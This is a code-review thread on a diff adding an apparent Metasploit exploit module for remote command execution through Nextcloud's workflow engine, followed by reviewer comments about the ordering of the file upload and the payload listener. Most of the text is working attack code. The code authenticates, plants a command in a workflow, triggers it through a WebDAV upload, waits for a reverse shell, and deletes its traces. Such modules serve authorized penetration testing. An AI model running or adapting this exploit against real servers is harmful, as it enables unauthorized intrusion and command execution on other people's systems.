modules/exploits/unix/webapp/nextcloud_workflows_rce.rb

```diff
@@ -0,0 +1,267 @@
+
+    if res.code == 200
+      json_data = JSON.parse(res.body)
+      flow_id = json_data['ocs']['data']['id']
+    end
+    flow_id
+  end
+
+  def upload_file(filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "remote.php/webdav/#{filename}"),
+      'method' => 'PUT',
+      'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' }
+    )
+  end
+
+  def delete_workflow(workflow_id)
+    url = "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}"
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, url),
+      'vars_get' => { 'format' => 'json' },
+      'method' => 'DELETE',
+      'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' },
+      'keep_cookies' => true
+    )
+  end
+
+  def delete_file(user, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "remote.php/dav/files/#{user}/#{filename}"),
+      'method' => 'DELETE',
+      'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' }
+    )
+  end
+
+  # At the end of the module, especially for reverse_tcp payloads, wait for
+  # the payload to connect back to us.  There's a very high probability we
+  # will lose the payload's signal otherwise.
+  #
+  # copied from: linux/http/huawei_hg532n_cmdinject.rb
+  #
+  def wait_for_payload_session
+    print_status 'Waiting for the payload to connect back ..'
+    begin
+      Timeout.timeout(datastore['ListenerTimeout']) do
+        loop do
+          break if session_created?
+
+          Rex.sleep(0.25)
+        end
+      end
+    rescue ::Timeout::Error
+      fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back')
+    end
+    print_good 'Payload connected!'
+  end
+
+  def check
+    # For the check command
+    cookie_jar.clear
+
+    authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    request_token
+    flow_id = create_workflow('sleep 1')
+
+    Exploit::CheckCode::Safe('Target is not vulnerable') if flow_id.nil?
+
+    delete_workflow(flow_id)
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    # Main function
+    cookie_jar.clear
+
+    authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+
+    request_token
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status('Sending payload..')
+    temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt"
+    flow_id = create_workflow(cmd.to_s)
+
+    fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil?
+
+    print_good('Workflow created')
+
+    Thread.new do
+      # wait a bit until wait_for_payload_session
+      # is up'n'running
+      Rex::ThreadSafe.sleep(10)
+      upload_file(temp_filename)
+    end
+
+    wait_for_payload_session
```

Comment:
Would it make sense to make this sequential, but just reverse the order? Something like: 
```suggestion
    wait_for_payload_session
    upload_file(temp_filename)
```
Or is there a reason why the thread has to be here?

Reply:
Wouldn't work just upload and then wait? From my very brief testing, it seemed like it's working. But that was just quick test, maybe your testing proved otherwise.

Reply:
depends how fast the payload gets triggered. I guess that in most cases it would be sufficient, because it takes a while until the cronjob triggers the payload. In cases where the cronjob is faster than the listener is ready, it would fail.

Reply:
Since I think that the payload will alway be triggered after the listener is ready, I just removed the thread.